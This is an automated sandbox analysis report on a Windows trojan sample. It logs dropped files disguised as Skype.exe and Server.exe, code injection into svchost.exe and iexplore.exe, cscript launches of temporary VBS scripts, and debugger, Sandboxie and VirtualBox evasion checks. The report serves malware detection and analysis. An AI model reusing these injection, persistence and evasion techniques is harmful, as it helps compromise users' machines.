Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Mutant created: \Sessions\1\BaseNamedObjects\C7379241760F18F4D05EC3BE
Source: C:\Windows\InstallDir\Server.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSma9HnKa
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8939E
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C88EF8
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8941B
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C8939E
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C88EF8
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C8941B
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C88ECC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C8939E
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C8941B
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C88EC4
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C8939E
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C8941B
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C88ECC
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C88EC4
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00485828
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00482ECC
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00455A30
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0046816C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00478D98
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0046DDC8
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0047A380
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0043957C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00402180
Source: C:\Windows\explorer.exe | Code function: 14_1_01B8939E
Source: C:\Windows\explorer.exe | Code function: 14_1_01B8941B
Source: C:\Windows\explorer.exe | Code function: 14_1_01B88EF8
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C8939E
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C8941B
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C88ECC
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C88EC4
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C8939E
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C8941B
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C88ECC
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C88EC4
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: String function: 00404D88 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: String function: 00406E2C appears 63 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C854EC appears 178 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C82F90 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C81F1C appears 180 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C82744 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C81BB4 appears 354 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C833A8 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C888D0 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: String function: 00C826F4 appears 40 times
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00C854EC appears 89 times
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00C81F1C appears 90 times
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00C81BB4 appears 177 times
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00C833A8 appears 47 times
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00C888D0 appears 41 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C854EC appears 178 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C82F90 appears 52 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C81F1C appears 180 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C82744 appears 42 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C81BB4 appears 354 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C833A8 appears 70 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C888D0 appears 82 times
Source: C:\Windows\InstallDir\Server.exe | Code function: String function: 00C826F4 appears 40 times
Source: C:\Windows\explorer.exe | Code function: String function: 01B81BB4 appears 87 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00C854EC appears 89 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00C81F1C appears 90 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00C81BB4 appears 177 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00C833A8 appears 46 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 00C888D0 appears 41 times
PE file contains executable resources (Code or Archives)
Source: 358saxio.exe.3.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: Skype.exe.12.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: 358saxio.exe.27.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: Skype.exe.35.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
PE file contains strange resources
Source: sxz.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 358saxio.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.12.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 358saxio.exe.27.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.35.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: sxz.exe, 00000001.00000002.14995935256.002F0000.00000008.sdmp | Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs sxz.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\sxz.exe | File read: C:\Users\user\Desktop\sxz.exe
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\43.0.1 (x86 en-US)\Main Install Directory
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: server.exe.2.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999469521605
Source: Server.exe.3.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999469521605
Classification label
Source: classification engine | Classification label: mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
Contains functionality for error logging
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0042212C GetLastError,FormatMessageA
Contains functionality to check free disk space
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_004093C0 GetDiskFreeSpaceA
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83A54 CreateToolhelp32Snapshot,Process32FirstW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,Process32NextW,CloseHandle
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8406C FindResourceW,SizeofResource,LoadResource,LockResource,FreeResource
Creates files inside the user directory
Source: C:\Users\user\Desktop\sxz.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Skype.exe
Creates temporary files
Source: C:\Users\user\Desktop\sxz.exe | File created: C:\Users\user~1\AppData\Local\Temp\ope641.tmp
Executable is probably coded in Java
Source: C:\Users\user\Desktop\sxz.exe | Section loaded: C:\Program Files\Java\jre1.8.0_40\bin\java.dll
Executes Visual Basic scripts
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\explorer.exe
Parts of this application are using Borland Delphi (probably coded in Delphi)
Source: C:\Users\user\Desktop\sxz.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Reads ini files
Source: C:\Users\user\Desktop\sxz.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\sxz.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: sxz.exe | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\sxz.exe 'C:\Users\user\Desktop\sxz.exe'
Source: unknown | Process created: C:\Users\user\Desktop\sxz.exe C:\Users\user\Desktop\sxz.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\server.exe 'C:\Users\user~1\AppData\Local\Temp\server.exe'
Source: unknown | Process created: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar'
Source: unknown | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Windows\InstallDir\Server.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Windows\InstallDir\Server.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: unknown | Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: unknown | Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Users\user\Desktop\sxz.exe | Process created: C:\Users\user\Desktop\sxz.exe C:\Users\user\Desktop\sxz.exe
Source: C:\Users\user\Desktop\sxz.exe | Process created: C:\Users\user\AppData\Local\Temp\server.exe 'C:\Users\user~1\AppData\Local\Temp\server.exe'
Source: C:\Users\user\Desktop\sxz.exe | Process created: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar'
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeProcess created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: C:\Windows\InstallDir\Server.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\InstallDir\Server.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\sxz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Uses Rich Edit Controls
Source: C:\Windows\explorer.exe | File opened: C:\Windows\system32\MsftEdit.dll
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Submission file is bigger than most known malware samples
Source: sxz.exe | Static file information: File size 2297344 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | File opened: C:\Program Files\Java\jre1.8.0_40\bin\msvcr100.dll
PE file has a big raw section
Source: sxz.exe | Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x22fa00

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\server.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C80000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\server.exe | Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 protect: page execute and read and write
Source: C:\Windows\InstallDir\Server.exe | Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C88EF8
Source: C:\Users\user\AppData\Local\Temp\server.exe | Thread created: C:\Program Files\Internet Explorer\iexplore.exe EIP: C88BC0
Source: C:\Windows\InstallDir\Server.exe | Thread created: C:\Program Files\Internet Explorer\iexplore.exe EIP: C88BC0
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\sxz.exe | Memory written: C:\Users\user\Desktop\sxz.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\server.exe | Memory written: C:\Windows\System32\svchost.exe base: C80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\server.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Memory written: C:\Users\user\AppData\Local\Temp\358saxio.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\InstallDir\Server.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\sxz.exe | Thread register set: target process: 3624
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Thread register set: target process: 2184
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Thread register set: target process: 2280
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\server.exe | Memory written: C:\Windows\System32\svchost.exe base: C80000
Source: C:\Users\user\AppData\Local\Temp\server.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000
Source: C:\Windows\InstallDir\Server.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\program_files_java_jre1.8.0_40_bin_dc0a9e79a9a08fab.cdf-ms
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_78530b0c641b30d5.cdf-ms
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\$$_installdir_1a6c4aae522d2aa2.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process queried: DebugPort
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83D8C LoadLibraryA,GetProcAddress,FreeLibrary
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C886CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C886CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C886CC mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C886CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\explorer.exe | Code function: 14_1_01B88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\explorer.exe | Code function: 14_1_01B88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\explorer.exe | Code function: 14_1_01B886CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C886CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C88674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C88760 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C886CC mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C823E8 GetProcessHeap,GetCurrentThreadId
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Memory protected: page read and write and page guard

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\InstallDir\Server.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\server.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_3-9517)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_3-9564)
Source: C:\Windows\System32\svchost.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_5-9467)
Source: C:\Windows\InstallDir\Server.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Program Files\Internet Explorer\iexplore.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_6-9701)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_3-10272)
Source: C:\Windows\InstallDir\Server.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes and other dynamic analysis tools (process name or module)
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exe | Binary or memory string: SBIEDLL.DLL
Tries to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: VBoxService.exe VBoxService.exe 3_2_00C881BC
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: VBoxService.exe VBoxService.exe 3_1_00C881BC
Source: C:\Windows\System32\svchost.exe | Code function: VBoxService.exe VBoxService.exe 5_2_00C881BC
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: VBoxService.exe VBoxService.exe 6_2_00C881BC
Source: C:\Windows\InstallDir\Server.exe | Code function: VBoxService.exe VBoxService.exe 15_2_00C881BC
Source: C:\Windows\InstallDir\Server.exe | Code function: VBoxService.exe VBoxService.exe 15_1_00C881BC
Enumerates the file system
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
